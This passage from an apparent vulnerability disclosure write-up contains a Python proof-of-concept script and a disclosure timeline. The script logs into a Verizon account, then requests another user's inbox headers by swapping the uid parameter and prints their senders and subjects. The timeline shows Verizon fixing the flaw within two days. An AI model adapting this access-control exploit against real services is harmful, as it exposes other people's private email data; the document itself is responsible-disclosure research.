    url = "https://auth.verizon.com/amserver/UI/Login?realm=dotcom&module=AIAW"
    payload = "IDToken1=%s&aamAuth=Y&minimalView=Y&RemMe=on&clientId=mobilefios" %username

    headers = {"Content-Type": "application/x-www-form-urlencoded",
               "Connection": "Keep-Alive", "User-Agent": None}

    r = s.post(url=url, data=payload,allow_redirects=False,verify=False, headers=headers)

    payload = "IDToken1=%s&aamAuth=Y&minimalView=Y&RemMe=on&clientId=mobilefios" %password

    headers = {"Cookie2" : "$Version=1", "Content-Type": "application/x-www-form-urlencoded",
               "Connection": "Keep-Alive"}

    r2 = s.post(url=url, data=payload, headers=headers, allow_redirects=False)

    if not (s.cookies.get("dotcomsid")):
        raise Exception("Error logging in")
    else:
        return s


s = do_login(username=validUsername, password=validPassword)

url = "http://www.verizon.com/mobilesvc/messagecenter/members/service/getEmail?format=json&" \
      "uid=%s&failOverSize=20&failOverStart=0&fid=INBOX" % targetUsername

r = s.get(url=url)

if r.json().get("res"):

    headerList = r.json().get("res").get("msgHeaderList")

    for header in headerList:
        subject = header.get("subject")
        sender = header.get("sender").get("address")
        print("%s - %s" % (sender, subject))

The script logs a valid user into the web service, fetches the inbox message headers for the target user, and prints out the from address and subject lines.

The next step was to reach out to Verizon. Being such a large company, I thought it was probably going to be difficult to get in contact with the right people. I tried their Twitter account, but their customer service reps weren’t very helpful. After reading this article, I figured reaching out to someone at [email protected] would at least point me in the right direction. They actually responded very quickly and confirmed they were the right group to report the issue to.

Disclosure Timeline

2015-01-14: Initial report to Verizon’s security group
2015-01-14: Verizon confirms receiving report, investigation begins
2015-01-15: Follow-up email with acknowledgement of the issue
2015-01-16: Fix released and confirmed

Verizon’s security group seemed to immediately realize the impact of this vulnerability and took it very seriously. They were very responsive during this process and even arranged for a free year of FiOS Internet service as a token of their gratitude.
